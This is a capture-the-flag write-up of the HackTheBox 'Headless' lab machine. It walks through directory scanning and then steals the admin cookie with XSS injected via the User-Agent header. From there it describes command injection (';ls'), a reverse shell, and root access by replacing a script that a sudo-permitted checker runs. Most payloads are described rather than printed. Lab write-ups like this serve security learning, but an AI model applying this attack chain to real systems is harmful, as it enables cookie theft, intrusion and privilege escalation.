after we know port 5000 open we scan using dirsearch
dirsearch-uhttp://10.129.36.41:5000/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
frompkg_resourcesimportDistributionNotFound,VersionConflict_|.______|_v0.4.3 (_|||_) (/_(_|| (_| )Extensions:php,aspx,jsp,html,js|HTTPmethod:GET|Threads:25|Wordlistsize:11723Output:/home/replican/Desktop/Prod/HackTheBox/machine/Headless/reports/http_10.129.36.41_5000/__24-05-18_22-02-29.txtTarget:http://10.129.36.41:5000/[22:02:29] Starting:[22:04:16] 401 - 317B - /dashboard[22:05:50] 200 - 2KB - /supportTaskCompleted
after we know /dashboard cant access ( it said unaothorized ) we go to the /support
after a while i notice the site is using cookies also
Exploitation
like usual ctf chall ( cookie, admin page, form without uploading any files) = xss
we directly put our payload xss but got blocked hmm
but our user agent also got reflected. so we can inject our user agent using burpsuite and input our payload xss to steal the cookie ( we assume in the backend the admin auto check our form )
as we see our payload work perfectly. now we opening server using http.server python to see the log requests
after sometimes. we get a response of the cookie admin.
after that we go into the dashboard and use command injection vulnerability ( because there is word system ) we assume this is command
and yep its command injection when we do ;ls the list of file appeared
directly to revshells
and we get the flag user.
Root Flag
Enumeration
because this is a linux also this is was easy machine i still use c2 framework sliver like usual.
first we see the mail
as we see we need to find system check script and ( create the database init script )
after that we use this
we have acess to sudo binary syscheck that is the inside searching script initdb.sh. we can simply make /bin/bash is root script and call it initdb.sh. and we call syscheck with sudo.
Exploitation
after we put our payload we run the syscheck and ( dont forget to create a listener )